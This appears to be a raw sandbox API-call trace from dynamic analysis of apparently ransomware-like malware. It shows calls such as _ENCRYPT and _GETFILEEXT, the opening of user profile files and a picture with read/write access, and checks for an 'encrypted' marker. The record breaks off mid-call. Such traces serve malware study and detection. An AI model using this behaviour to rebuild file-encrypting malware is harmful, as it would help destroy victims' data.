WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c9a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0039.207] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0039.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0039.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0039.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0039.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0039.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0039.208] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.208] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.208] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0039.208] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0039.208] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.208] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.208] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0039.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.208] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.208] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.209] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.209] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.209] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.209] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0039.209] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.209] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.209] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.209] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0039.209] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.209] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.209] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.210] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.210] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.210] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.210] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.210] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0039.210] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.210] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.210] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.210] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0039.210] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.210] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.210] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.210] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.210] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.211] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.211] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.211] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0039.211] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.211] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.211] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.211] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0039.211] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.211] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.211] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.211] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.211] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.212] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.212] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.212] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0039.212] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.212] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.212] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.212] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0039.212] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.212] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.212] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.212] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.212] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.212] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.212] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.213] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.213] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.213] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.213] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.213] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.213] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.213] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.213] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.214] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.214] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0039.214] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.214] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0039.214] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0039.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.214] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.214] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.214] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.214] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.214] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ntuser.ini", cAlternateFileName="")) returned 0x7c20c0 [0039.214] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.214] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.214] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ntuser.ini", cAlternateFileName="")) returned 0x7c20c0 [0039.215] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.215] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.215] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.215] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.215] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.215] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.215] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.215] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.215] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.215] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.215] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.215] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\61ot9 dm-iobugp.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.215] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.215] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.215] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.216] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0039.216] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0039.216] FreeLibrary (hLibModule=0x76e10000) returned 1 [0039.216] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0039.216] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.216] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0039.216] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.216] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0039.216] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0039.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.216] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.216] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.216] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.216] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.216] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46b1d10, ftCreationTime.dwHighDateTime=0x1d5bebe, ftLastAccessTime.dwLowDateTime=0x76997d50, ftLastAccessTime.dwHighDateTime=0x1d5c486, ftLastWriteTime.dwLowDateTime=0x76997d50, ftLastWriteTime.dwHighDateTime=0x1d5c486, nFileSizeHigh=0x0, nFileSizeLow=0x131c1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="61Ot9 dm-iOBUGP.jpg", cAlternateFileName="61OT9D~1.JPG")) returned 0x7c20c0 [0039.217] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.217] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.217] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46b1d10, ftCreationTime.dwHighDateTime=0x1d5bebe, ftLastAccessTime.dwLowDateTime=0x76997d50, ftLastAccessTime.dwHighDateTime=0x1d5c486, ftLastWriteTime.dwLowDateTime=0x76997d50, ftLastWriteTime.dwHighDateTime=0x1d5c486, nFileSizeHigh=0x0, nFileSizeLow=0x131c1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="61Ot9 dm-iOBUGP.jpg", cAlternateFileName="61OT9D~1.JPG")) returned 0x7c20c0 [0039.217] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0039.217] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\61Ot9 dm-iOBUGP.jpg\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0039.217] CompareStringW 